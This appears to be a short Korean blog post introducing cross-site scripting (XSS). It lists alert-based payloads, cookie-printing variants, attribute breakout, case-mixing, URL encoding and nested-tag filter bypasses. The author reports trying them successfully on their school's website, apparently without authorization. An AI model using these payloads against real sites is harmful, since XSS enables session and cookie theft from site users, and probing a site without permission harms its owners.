크로스 사이트 스크립팅 공격

크로스 사이트 스크립팅이란 악성 스크립트문을 사용해서 사용자의 쿠키나 세션을 탈취하는 기법으로 웹에서 발생하는 해킹기법으로 볼 수 있다.

 

일단 크롬에서는 기본적으로 크로스 사이트 스크립팅 코드를 입력하면 막기 때문에 인터넷 익스플로어를 사용했다. 

<script>alert(123)</script>

가장 기초적인 스크립트 문이다. 123이라고 알림창이 나오게 하는 문이다.

참고로 학교 홈페이지에서는 이런 간단한 문도 잘나온다.

<script>alert(document.cookie)</script>
여기서 쿠키 정보를 출력하게 할 수 있는데



역시 잘나온다.

<input type="text" name="state" value="INPUT_FROM_USER"> 
참고로 조금만 html문을 안다면 

이렇게 검색창을 만드는 기행도 가능하다.

"><script >alert(document.cookie)</script > 

다음은 스크립트 문을 조금 수정한 것이다/

"><ScRiPt>alert(document.cookie)</ScRiPt>

"%3cscript%3ealert(document.cookie)%3c/script%3e 
%3c는 아스키 코드로 < %3e는 >를 나타낸다.

참고로 이렇게 변형한 스크립트 문은 작동을 안한다.

<scr<script>ipt>alert(document.cookie)</script>

또한 바이패싱문으로 <src<script>ipt>문을 작성해보았다.

역시 복잡한 문은 작동을 안한다.